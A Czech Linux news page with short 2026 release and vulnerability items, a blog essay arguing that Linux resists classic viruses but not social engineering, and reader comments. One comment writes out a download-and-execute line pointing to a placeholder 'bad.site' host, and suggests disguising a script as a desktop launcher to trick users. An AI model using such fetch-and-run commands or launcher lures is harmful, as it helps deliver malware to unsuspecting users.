Byl vydán Debian 13.6, tj. šestá opravná verze Debianu 13 s kódovým názvem Trixie a Debian 12.15, tj. poslední patnáctá opravná verze Debianu 12 s kódovým názvem Bookworm, k dispozici je LTS. Řešeny jsou především bezpečnostní problémy, ale také několik vážných chyb. Instalační média Debianu 13 a Debianu 12 lze samozřejmě nadále k instalaci používat. Po instalaci stačí systém aktualizovat.
V jádře Linux byla nalezena a v upstreamu již byla opravena kritická zranitelnost GhostLock aneb CVE-2026-43499. Lokálnímu uživateli umožňuje získat práva roota a také obejít kontejnerovou izolaci. Zranitelnost existovala v Linuxu 15 let, tj. od roku 2011, od Linuxu verze 2.6.39.
Evropská komise předběžně shledala, že návykový design aplikací Instagram a Facebook od americké společnosti Meta porušuje unijní nařízení o digitálních službách (DSA). Návykový design zahrnuje například takzvané nekonečné posouvání, automatické přehrávání videí, tzv. push notifikace, kdy aplikace uživatele vybízí k návratu do jejího prostředí, či vysoce personalizovaný algoritmus, který rychle pozná, co uživatele baví a snaží
… více »Byla vydána verze 1.97.0 programovacího jazyka Rust (Wikipedie). Podrobnosti v poznámkách k vydání. Vyzkoušet Rust lze například na stránce Rust by Example.
Švýcarská společnost Punkt. má nově v nabídce telefon Punkt. MC03. Telefon byl navržen ve Švýcarsku s důrazem na soukromí a digitální suverenitu a vyroben v Německu. V telefonu běží operační systém AphyOS (Apostrophy OS) založený na AOSP (Android Open Source Project) 15. Cena telefonu je 745 eur.
TypeScript (Wikipedie), tj. JavaScript rozšířený o statické typování a další atributy, byl vydán v nové verzi 7.0. Kompilátor byl kvůli výkonu přepsán z TypeScriptu do Go.
Europarlament podpořil pozměněnou verzi výjimky známé jako „chat control 1.0“ umožňující firmám skenovat soukromou komunikaci na internetu kvůli ochraně dětí před zneužitím. Pozměňovací návrhy přijaté europoslanci však počítají s tím, že z výjimky bude vyřazena šifrovaná komunikace. Výjimka přestala platit začátkem dubna poté, co se Evropský parlament a Rada EU nedokázaly shodnout na jejím prodloužení. Rada následně přijala
… více »Nejnovější X.Org X server 21.1.24 a Xwayland 24.1.13 řeší 2 bezpečnostní chyby.
Clement "Clem" Lefebvre publikoval souhrn dění v Linux Mintu za červen 2026. Vypíchnuta je vylepšená podpora Waylandu. Už není považována za experimentální. V příští verzi Linux Mintu, plánována je na Vánoce, bude běh Cinnamonu plně podporován na X11 i Waylandu. V květnu na vývoj Linux Mintu přispělo 611 dárců celkovou částkou 19 612 dolarů. Dalších 2 326 patronů přispělo na Patreonu celkovou částkou 5 334 dolarů.
V Linuxu v KVM byla nalezena a v upstreamu již byla opravena kritická zranitelnost Januscape aneb CVE-2026-53359. Root na hostovaném počítači (virtuální stroj) může obejít izolaci a získat plnou kontrolu nad hostitelským systémem (DoS útok nebo vzdálené spuštění kódu s právy roota). Na obou hlavních architekturách – Intel i AMD. Zranitelnost v Linuxu existovala téměř 16 let (od srpna 2010 do června 2026).
Poté, co pan Kaspersky na root.cz pronesl, že počet virů bude stoupat s nárůstem uživatelů Linuxu, strhla se vlna příspěvků, které ho odsoudili. Jenže, je (a bude) Linux a především jeho uživatelé v bezpečí?
Význam slova (počítačový) vir prošel časem jistou proměnou. Za dávných časů MS-DOSu existovaly viry jako OneHalf, Pieczk, které napadaly bootsektory disket, rezidentně se schovávaly v paměti a chovaly se polymorfně. Všeobecně to byly velmi sofistikované kusy kódu, navíc s destruktivními účinky.
Ovšem doba pokročila. Dnes se běžně pod pojem vir schová spyware, červ, nebo jakýkoli jiný, zákeřný kód zhusta vygenerovaný nějakým scriptkiddie ve VisualBasicu. Odborníci sice protestují a používají termíny přesně, ale jsou v přesile (a koneckonců máme demokracii
) a je to častem zdrojem nedorozumění.
Doba změnila i účel těchto aplikací. Místo destruktivní činnosti se zaměřují na posílání spamů, sledování uživatele, zobrazování reklam, nebo obecně slouží jako jednotka v nějakém tom botnetu
Takže pojmem vir obecně označuje libovolný škodlivý kód a já ho budu v tomto významu používat i nadále.
Mnoho virů se šíří automaticky kdysi po disketách, dnes po síti. Ovšem trojské koně, nebo spyware, je často součástí nějaké aplikace. Nástupu ILOVEYOU ukázal, že místo složitých technik je jednodušší prostě použít sociálního inženýrství a nechat uživatele, ať si kód posílejí sami.
Klasické viry typu OneHalf - vůči nim je Linux díky svojí unixové architektuře odolný. Systém oddělených práv v kombinaci s aktualizovaným systémem a velkou heterogenitou těchto systémů neumožňují psát viry, které by se mohly víc šířit - seznam linuxových virů
Červy - jsou velice podobné virům, ale klasicky se takto označují ty programy, které se šíří prostřednictvím sítě. Unixové systémy nejsou proti těmto útokům odolné, ale rychlé bezpečnostní aktualizace spolu s velkou heterogenitou nedávají těmto potvůrkám velkou šanci. Navíc, útoky jsou vesměs vedeny proti známým děravým programům typu ftp servery, nebo bind, které proto mnozí správci ponechávají v chrootu.
Z hlediska správce serveru jsou tyto útoky významné, z hlediska desktopového uživatele už méně (pokud si aktualizuje distribuci, je téměř bez šance mu nakazit systém)
Na desktopu v současnosti používají Linux vesměs geekové, takže vytvářet ILOVEOYU.sh je úplně zbytečné, protože si to nikdo nespustí. Jenže, pokud jej bude používat každá sekretářka, bude se ILOVEYOU.sh spouštět i tam. Jediným rozdílem je, že je na Linuxu řádově složitější takový program spustit, ale v momentě, kdy bude v emailu od kamarádky napsaný návod, pravděpodobnost spuštění vzroste.
Navíc, každý správný unix nabízí dostatek prostoru pro oběšení uživatele. Takové KDE se svým DCOPem nabízí takové možnosti, nad nimiž by se bastličům ve VBS asi protočily panenky. Jakmile nastoupí DBUS, bude mít každý vir, který nějak uživatele donutí, aby jej spustil, prakticky ráj na zemi. Prohlížeče pravidelně ukazující zadané weby, dialogová okna s reklamou, a kdo ví, co všechno tyto lidi napadne.
Linux jako systém je vůči škodlivému kódu odolný. Nemusíme se bát automaticky spouštěných příloh, nebo naboření systému. Máme balíčky, máme unixovou architekturu, atd. A v současnosti je většina linuxáků počítačovými odborníky, co nespouštějí každou blbost.
Ovšem na co dnes rozhodně není nikdo připraven je situace, až začnou negeekům chodit emaily typu
To view naked Paris Hilton, save an attachment and type 'sh paris_naked.sh'a budou volat vás, kteří budete budete muset počítač od toho nějak vyčistit (a poslouchat řeči "vždyť jsi říkal, že na tom Linuxu nemají být viry"). A před neznalostí/hloupostí uživatele nedokáže chránit žádný systém (který by šlo zároveň používat).
Tiskni
Sdílej:
sh paris-hilton.wmv.
Ale nejlepší bude, použít takové ty .desktop soubory (z ~/Desktop), protože lidi si často ukládají věci na plochu. Ty mají samozřejmě i položku Exec...
wget "http://bad.site/virus -O /tmp/virus"; sh /tmp/virus ...
Někdy přemýšlím, jestli náhodou sami neplatí za vývoj(nebo nevyvyjí) virů
, aby si každý musel koupit jejich skvělý produkt který ochrání jeho počítač
0K1AS
PS: Osobně mně tedy přijde, že ani na Windows(XP SP2,bez WinUpdate) zkušenější uživatel nepotřebuje antivirus. Stačí nespouště exe které člověk si nestahnul z ověřených zdrojů. Samozřejmě i tak je dobré jednou za pl roku to něčím zkontrolovat, ale po 2 letech jsem nepotkal ani virus.
PS: Osobně mně tedy přijde, že ani na Windows(XP SP2,bez WinUpdate) zkušenější uživatel nepotřebuje antivirus. Stačí nespouště exeNení to tak dávno, co se Windowsy hromadně nakazily pouze surfováním po netu - rozhodně nebylo třeba spouštět žádné .exe. To byl takovej ten virus, co po čase rebootnul systém... je to několik málo let a bylo to opravdu všude. Dokonce obchody nabízely (nevím jestli u nás, ale v Německu ano) k nedávno prodaným počítačům CD s aktualizací a pomocným programem.
.
, ale FireFox
Když selžou všechny pokusy uvést zařízení do provozu, je dobré přečíst si návod.Není to tak dávno, co se Windowsy hromadně nakazily pouze surfováním po netu - rozhodně nebylo třeba spouštět žádné .exe. To byl takovej ten virus, co po čase rebootnul systém... je to několik málo let a bylo to opravdu všude.To je ta méně závažná polovina. Ve skutečnosti je tato díra zajímavější tím, že na ni existoval Windows exploit jak pro script kiddie, kam stačilo zadat pouze cílovou IP adresu a vyskočil vzdálený příkazový řádek. Jmenovalo se to nějak na způsob DCOM RPC Exploit by DarkSideOfKalez. A tomu restartu šlo zabránit nějakým přepínačem od shutdown, tuším shutdown /k nebo shutdown /i.
. Firmy jak Symantec apod. nevydělavají díky nějakým zkušeným haxourům, kteří píší sofistikované viry, ale vydělávají jen a pouze na blbosti uživatelů.
.
Jinak hezky sepsane.
Zkusil, většinou segfaultovaly, nebo na něčem spadly, ale pár se jich zdálo spustitelných. ;)
Paris.Hilton.desktop (sh, py, pl, ...) tak to poslední, co udělám je, že na to kliknu, dokud nezjistím, o co jde
Takto se asi zachová většina uživatelů.
Na druhou stranu, co se asi stane, až přijde mojí přítelkyni email od kamarádky s přílohou Brad.Pitt.desktop s instrukcemi, ulož na plochu a klikni?
Na druhou stranu, co se asi stane, až přijde mojí přítelkyni email od kamarádky s přílohouPak Linux zvítězilBrad.Pitt.desktops instrukcemi, ulož na plochu a klikni?